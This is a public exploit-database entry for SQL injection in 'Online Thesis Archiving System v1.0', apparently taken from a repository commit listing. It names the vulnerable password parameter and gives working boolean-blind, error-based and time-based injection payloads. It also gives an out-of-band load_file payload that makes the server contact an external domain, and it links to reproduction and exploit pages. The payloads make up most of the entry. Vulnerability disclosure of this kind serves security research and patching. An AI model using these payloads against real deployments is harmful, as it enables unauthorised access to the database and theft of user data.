158fcdfd5c
11 changes to exploits/shellcodes/ghdb Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) Online Thesis Archiving System v1.0 - Multiple-SQLi projectSend r1605 - CSV injection projectSend r1605 - Stored XSS Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated) Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated) PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
79 lines
No EOL
2.8 KiB
Text
79 lines
No EOL
2.8 KiB
Text
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
|
|
## Author: nu11secur1ty
|
|
## Date: 06.12.2023
|
|
## Vendor: https://github.com/oretnom23
|
|
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
|
|
## Reference: https://portswigger.net/web-security/sql-injection
|
|
|
|
## Description:
|
|
The password parameter appears to be vulnerable to SQL injection
|
|
attacks. The payload '+(select
|
|
load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
|
|
was submitted in the password parameter.
|
|
This payload injects a SQL sub-query that calls MySQL's load_file
|
|
function with a UNC file path that references a URL on an external
|
|
domain. The application interacted with that domain, indicating that
|
|
the injected SQL query was executed. The attacker can dump all
|
|
information from the
|
|
database of this system, and then he can use it for dangerous and
|
|
malicious purposes!
|
|
|
|
STATUS: HIGH-CRITICAL Vulnerability
|
|
|
|
[+]Payload:
|
|
```mysql
|
|
---
|
|
Parameter: password (POST)
|
|
Type: boolean-based blind
|
|
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
|
|
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
|
|
OR NOT 1404=1404-- Eotr
|
|
|
|
Type: error-based
|
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
|
|
GROUP BY clause (FLOOR)
|
|
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
|
|
AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
|
|
(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
|
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
|
|
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
|
|
AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
|
|
---
|
|
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
|
|
|
|
## Proof and Exploit:
|
|
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
|
|
|
|
## Time spend:
|
|
01:15:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
|
|
https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |